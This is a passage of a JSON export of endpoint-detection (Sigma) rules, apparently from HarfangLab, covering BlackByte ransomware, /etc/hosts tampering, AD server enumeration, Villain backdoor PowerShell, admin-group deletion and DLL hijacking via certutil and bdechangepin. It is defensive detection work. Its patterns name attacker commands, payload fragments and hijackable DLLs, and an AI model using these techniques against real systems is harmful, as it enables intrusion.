'?:\\Windows\\System32\\svchost.exe -a ????????'\n - '?:\\Windows\\System32\\svchost.exe -w ????????'\n - '?:\\Windows\\System32\\svchost.exe -s ????????'\n ParentCommandLine|endswith:\n - ' -a ????????'\n - ' -w ????????'\n - ' -s ????????'\n - ' -a ???????? svc'\n - ' -w ???????? svc'\n - ' -s ???????? svc'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4db7476a-88be-4716-891f-51278f296c69",
"rule_name": "BlackByte Ransomware Executed",
"rule_description": "Detects the suspicious execution of svchost.exe with command-line arguments related to the BlackByte Ransomware.\nBlackByte injects its device encryption process into svchost.exe using the process hollowing method.\nBlackByte is also known to have performed BYOVD (vulnerable drivers) techniques in order to disable security products.\nIt is recommended to investigate any other alerts indicating malicious activity related to ransomware actors and to dump this process and analyze its contents to determine legitimacy.\n",
"rule_creation_date": "2024-02-21",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4dbbc098-7309-4a0f-9571-5757305e0261",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.609270Z",
"creation_date": "2026-03-23T11:45:34.622116Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622121Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_etc_hosts_modified.yml",
"content": "title: Suspicious Modification of /etc/hosts\nid: 4dbbc098-7309-4a0f-9571-5757305e0261\ndescription: |\n Detects a suspicious attempt to modify /etc/hosts.\n This file is part of the network configuration and can be modified to falsify hosts resolution.\n It is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1562/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/hosts'\n - TargetPath: '/etc/hosts'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_image:\n ProcessImage:\n - '/opt/f5/vpn/svpn'\n - '/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - '/opt/cisco/secureclient/bin/vpnagentd'\n - '/opt/cisco/anyconnect/bin/vpnagentd'\n - '/usr/bin/ln'\n - '/usr/bin/crio'\n - '/usr/lib/x86_64-linux-gnu/guix/guile'\n - '/gnu/store/*/bin/guile'\n - '/usr/bin/chown'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/bin/pacman'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - 
ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_reconfigure:\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n - ProcessParentCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains: '|/usr/bin/containerd|'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '/usr/bin/containerd-shim'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/lxc-start|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '/usr/bin/podman'\n\n exclusion_aerohive:\n ProcessGrandparentProcessName: 'aerohive-config'\n ProcessCommandLine: 'cp -f /tmp/hosts.new /etc/hosts'\n\n # 
https://github.com/GoogleCloudPlatform/guest-configs/blob/master/src/usr/bin/google_set_hostname\n exclusion_googlecloud1:\n ProcessCommandLine: '/bin/sh /sbin/dhclient-script'\n ProcessParentImage: '/sbin/dhclient'\n\n exclusion_googlecloud2:\n ProcessCommandLine: 'sed -i /Added by Google/d /etc/hosts'\n ProcessParentCommandLine: '/bin/sh /sbin/dhclient-script'\n\n exclusion_veritas:\n ProcessCommandLine: '/usr/bin/python /opt/VRTScloudpoint/bin/flexsnap-agent.py'\n\n exclusion_proxmox:\n - ProcessCommandLine: 'pvedaemon'\n - ProcessAncestors|contains: '|/usr/libexec/proxmox/proxmox-termproxy|'\n\n exclusion_tee_append:\n ProcessImage: '/usr/bin/tee'\n ProcessCommandLine|startswith: 'tee -a '\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4dbbc098-7309-4a0f-9571-5757305e0261",
"rule_name": "Suspicious Modification of /etc/hosts",
"rule_description": "Detects a suspicious attempt to modify /etc/hosts.\nThis file is part of the network configuration and can be modified to falsify hosts resolution.\nIt is recommended to ensure that the file has been modified by a legitimate process and that the new content is not malicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e1fe352-a793-486e-8df4-20205d11b905",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627123Z",
"creation_date": "2026-03-23T11:45:34.627125Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627130Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_windows_servers_enumeration_powershell.yml",
"content": "title: Windows Servers Enumeration via PowerShell\nid: 4e1fe352-a793-486e-8df4-20205d11b905\ndescription: |\n Detects the use of PowerShell to enumerate computer objects in Active Directory related to Windows Server operating systems.\n This may indicate reconnaissance activity focused on identifying server assets for further compromise.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/07/10\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - 'objectCategory=Computer'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n - 'operatingsystem'\n - '-match'\n - 'Windows Server'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '### DO NOT EDIT THIS FILE DIRECTLY ###'\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e1fe352-a793-486e-8df4-20205d11b905",
"rule_name": "Windows Servers Enumeration via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate computer objects in Active Directory related to Windows Server operating systems.\nThis may indicate reconnaissance activity focused on identifying server assets for further compromise.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e359ad0-b742-4cbb-b891-6e4324df0c1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084466Z",
"creation_date": "2026-03-23T11:45:34.084468Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084472Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_001_powershell_villain_backdoor_obfuscated.yml",
"content": "title: Suspicious PowerShell Obfuscated Command linked to Villain\nid: 4e359ad0-b742-4cbb-b891-6e4324df0c1f\ndescription: |\n Detects PowerShell commands executing a Villain-obfuscated payload.\n Villain is a Windows & Linux backdoor generator and multi-session handler.\n The framework allows attackers to instantiate shells and control other machines running Villain in the network.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1132.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Villain\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$*$*/????????'\n - '$env:COMPUTERNAME'\n - '$env:USERNAME'\n - '-Method POST'\n - '-Headers @{Authorization='\n - '-ur? $*$*/????????'\n - '-join'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e359ad0-b742-4cbb-b891-6e4324df0c1f",
"rule_name": "Suspicious PowerShell Obfuscated Command linked to Villain",
"rule_description": "Detects PowerShell commands executing a Villain-obfuscated payload.\nVillain is a Windows & Linux backdoor generator and multi-session handler.\nThe framework allows attackers to instantiate shells and control other machines running Villain in the network.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e41f7ae-28b5-46f8-a490-18dd0a687c26",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622974Z",
"creation_date": "2026-03-23T11:45:34.622976Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622980Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1531/"
],
"name": "t1531_delete_user_from_administrators_group.yml",
"content": "title: User Administrators Group Deleted via net.exe\nid: 4e41f7ae-28b5-46f8-a490-18dd0a687c26\ndescription: |\n Detects the execution of net command to delete a user from an administrators group.\n Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\n This can hamper recovery actions and render access difficult to infected machines.\n It is recommended to investigate the process at the origin of the execution of the \"net\" command to determine whether this action is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1531/\ndate: 2021/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1531\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_group:\n CommandLine|contains:\n - ' localgroup '\n - ' group '\n - ' groups '\n\n # Matches administrators, administrateurs, domain admin, ...\n selection_admin:\n CommandLine|contains: 'admin'\n\n selection_deletion:\n CommandLine|contains:\n - '/delete'\n - '/del'\n - '\\delete'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\CCM\\TSMBootstrap.exe'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n\n exclusion_schedule:\n ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e41f7ae-28b5-46f8-a490-18dd0a687c26",
"rule_name": "User Administrators Group Deleted via net.exe",
"rule_description": "Detects the execution of net command to delete a user from an administrators group.\nAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nThis can hamper recovery actions and render access difficult to infected machines.\nIt is recommended to investigate the process at the origin of the execution of the \"net\" command to determine whether this action is legitimate.\n",
"rule_creation_date": "2021-12-21",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1531"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e751948-6a09-4460-963e-1bc188aad0ae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594615Z",
"creation_date": "2026-03-23T11:45:34.594618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594626Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certutil.yml",
"content": "title: DLL Hijacking via certutil.exe\nid: 4e751948-6a09-4460-963e-1bc188aad0ae\ndescription: |\n Detects potential Windows DLL Hijacking via certutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'certutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\certcli.dll'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.DLL'\n - '\\LOGONCLI.DLL'\n - '\\ncrypt.dll'\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\NTDSAPI.dll'\n - '\\SAMCLI.DLL'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 
'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4e751948-6a09-4460-963e-1bc188aad0ae",
"rule_name": "DLL Hijacking via certutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via certutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4e8149a4-c0a1-4afd-abbf-ca10b45c941a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592521Z",
"creation_date": "2026-03-23T11:45:34.592525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592532Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdechangepin.yml",
"content": "title: DLL Hijacking via bdechangepin.exe\nid: 4e8149a4-c0a1-4afd-abbf-ca10b45c941a\ndescription: |\n Detects potential Windows DLL Hijacking via bdechangepin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdechangepin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n 